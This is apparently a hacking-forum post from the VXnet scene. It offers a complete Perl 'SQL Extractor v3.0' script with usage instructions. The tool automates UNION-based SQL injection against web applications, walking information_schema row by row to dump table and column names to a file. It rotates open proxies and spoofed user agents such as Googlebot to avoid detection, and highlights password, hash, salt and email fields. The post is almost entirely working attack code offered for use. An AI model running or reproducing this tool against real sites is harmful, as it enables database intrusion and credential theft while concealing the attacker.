[+]Topic: Code
[+]Von: ShaQ
[+]Return: Code


SQL Database Extractor!

Proxy Support + Proxy Switcher,
UserAgent Switcher
Hightlights some special Words

Howto Use:

perl sql_extract.pl "http://localhost/cgi-bin/index.cgi?id=2'+union+ 
select+1,2,concat_ws(0x203a20,table_schema,table_name,column_name),4,5+
from+information_schema.columns+limit+NUM,1-- f foobar" 900 database.txt


#!/usr/bin/perl -w #===== SQL EXTRACTOR V3.0 =======================================================# #== ==# #===== InfoZ ====================================================================# #== ==# #== Code: Perl ==# #== Coder: ShaQ ==# #== Typ: SQL Extractor v3.0 ==# #== SiteZ: Vxnetw0rk.ws ==# #== Contact: Private Message ==# #== GreeZ: All Members of VXnet. I love you :D ==# #== ==# #===== Usage ====================================================================# #== ==# #== perl $0 "Query with Limit NUM,1" StartNum FileToSave ==# #== ==# #== Example : ==# #== perl sql_extract.pl "http://localhost/cgi-bin/index.cgi?id=2'+union+ ==# #== select+1,2,concat_ws(0x203a20,table_schema,table_name,column_name),4,5+ ==# #== from+information_schema.columns+limit+NUM,1-- f foobar" 900 database.txt ==# #== ==# #================================================================================# use strict; use warnings; use Term::ANSIColor qw(:constants); use LWP::UserAgent; # --- Proxies --- # my @proxies = ("89.28.178.40:8080", "94.23.2.182:8118", "109.86.220.235:3128"); # --- UserAgents --- # my @agents = ("Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)", "Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)", "Opera/9.70 (Linux i686 ; U; zh-cn) Presto/2.2.0", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "msnbot/1.1 (+http://search.msn.com/msnbot.htm)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008061920 IceCat/3.0-g1", "Mozilla/5.0 (compatible; Konqueror/3.2; Linux 2.6.2) (KHTML, like Gecko)", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8", "Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00", "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.8) Gecko/20080528 Fedora/2.24.3-4.fc10 Epiphany/2.22 Firefox/3.0", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en; rv:1.9.0.10pre) Gecko/2009041800 Camino/2.0b3pre (like Firefox/3.0.10pre)/0.A.B.C Safari/525.13", "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10", "Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)"); my $proxyCount = @proxies; my $agentCount = @agents; my @downlist = (); my $proxy = ""; if (@ARGV < 3) {usage();} my ($query,$StartNum,$FileToSave) = @ARGV; if ($query =~ /0x3a/) { $query =~ s/0x3a/0x3a3a/; } elsif ($query =~ /0x3a3a/) {} elsif ($query =~ /0x203a20/) { $query =~ s/0x203a20/0x3a3a/; } else {error("Concat_ws split must be 0x3a , 0x3a3a or 0x203a20");exit;} if ($query !~ /NUM/) {error("No NUM found", 1)} my $ua = LWP::UserAgent->new(); scan(); sub scan { open(W,'>',$FileToSave); while(1) { $ua->agent($agents[int(rand($agentCount))]); setProxy(); my $str = $query; $str =~ s/NUM/$StartNum/; my $response = $ua->get($str); if(!$response->is_success) { error("Proxy down?\n$proxy skipped...", 0); push(@downlist, $proxy); scan(); } if ($response->content =~ m/(.*)::(.*)::(.*)/ ) { my ($t1, $t2, $t3) = ($1, $2, $3); if($t1 =~ /user|admin|email|pass|salt|hash/i || $t2 =~ /user|admin|email|pass|salt|hash/i || $t3 =~ /user|admin|email|pass|salt|hash/i) { print GREEN, BOLD, "[$StartNum] $t1 : $t2 : $t3\n", RESET; } else { print "[$StartNum] $t1 : $t2 : $t3\n"; } print W "[$StartNum] $t1 : $t2 : $t3\n"; $StartNum++; } else {error("I hope this Result is nice for you :P", 1);} } } sub setProxy { $proxy = $proxies[int(rand($proxyCount))]; setProxy() if(grep $_ eq $proxy, @downlist); $ua->proxy('http', 'http://' . $proxy); } sub usage { print "================ USAGE =================\n"; print YELLOW, BOLD, "perl $0 \"query with Limit NUM,1\" StartNum FileToSave", RESET, "\n"; print "========================================\n"; exit; } sub error { print "================ INFOZ =================\n"; print RED, BOLD, $_[0], RESET, "\n"; print "========================================\n"; if($_[1] == 1) { close(W); exit; } }